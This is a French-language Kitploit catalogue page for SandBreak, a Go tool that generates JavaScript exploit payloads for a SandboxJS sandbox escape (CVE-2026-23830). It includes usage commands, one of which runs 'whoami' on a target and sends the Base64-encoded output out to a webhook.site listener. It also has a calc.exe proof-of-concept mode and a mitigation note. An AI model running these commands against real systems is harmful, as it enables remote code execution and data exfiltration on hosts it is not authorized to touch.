Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23830-SandBreak — Génère et fournit des charges utiles d'exploitation pour CVE-2026-23830, une évasion de SandboxJS, avec des modes pour l'exfiltration OOB aveugle et un PoC local de type calc. Prend en charge les écouteurs HTTP/HTTPS et produit des charges utiles JavaScript minifiées. | Kitploit
Outils/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Génère et fournit des charges utiles d'exploitation pour CVE-2026-23830, une évasion de SandboxJS, avec des modes pour l'exfiltration OOB aveugle et un PoC local de type calc. Prend en charge les écouteurs HTTP/HTTPS et produit des charges utiles JavaScript minifiées.

Voir le dépôt
1il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SandBreak

Générateur d'exploit CVE-2026-23830 et outil d'auto-pwn

Go Version License Type

SandBreak est un générateur d'exploit robuste basé sur Go, conçu pour exploiter la vulnérabilité d'évasion SandboxJS (CVE-2026-23830).

Cet outil exploite le constructeur AsyncFunction non protégé dans les anciennes versions de sandboxjs, permettant aux attaquants de s'échapper de l'environnement sandbox V8 et d'exécuter du code arbitraire sur le système hôte. Il prend en charge plusieurs modes de payload, notamment l'exfiltration aveugle hors bande (OOB), la défiguration et l'exécution de code à distance basée sur les erreurs.


Fonctionnalités

  • 2 modes d'attaque :
    • oob : Exfiltration de données hors bande (HTTP/HTTPS) pour les scénarios aveugles.
  • calc : Ouvre calc.exe (PoC classique).
  • OOB intelligent : Détecte automatiquement HTTP vs HTTPS pour éviter les crashs du serveur.
  • Basé sur Go : Binaire unique, aucune dépendance requise sur la machine de l'attaquant.
  • Léger : Génère des payloads JavaScript purs et minifiés.

  • Installation

    Clonez le dépôt et exécutez :

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    Utilisation

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
    

    1. Mode OOB (RCE aveugle - Professionnel)

    Utilisez ce mode lorsque vous n'avez aucun retour visuel. Il exécute la commande et envoie le résultat encodé en Base64 à votre écouteur (par exemple, webhook.site).

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    Contourne avec succès les crashs de filtrage egress de base en gérant les erreurs réseau.

    2. Mode Calc (Test local)

    Ouvre une calculatrice sur le serveur Windows.

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    Preuve de concept (PoC)

    Scénario : Exfiltration OOB

    L'attaquant reçoit les données utilisateur du serveur via Webhook malgré l'absence de sortie visuelle sur le site.


    Avertissement

    Cet outil est créé uniquement à des fins éducatives et pour des tests d'intrusion autorisés.

    • N'utilisez pas cet outil sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
    • L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil.

    Atténuation

    Mettez à niveau sandboxjs vers la dernière version où le constructeur AsyncFunction est correctement sandboxé.

    root@kitploit:~
    npm update sandboxjs
    

    Auteur : Meysam Bal-afkan

    Licence : MIT

    Télécharger l’outil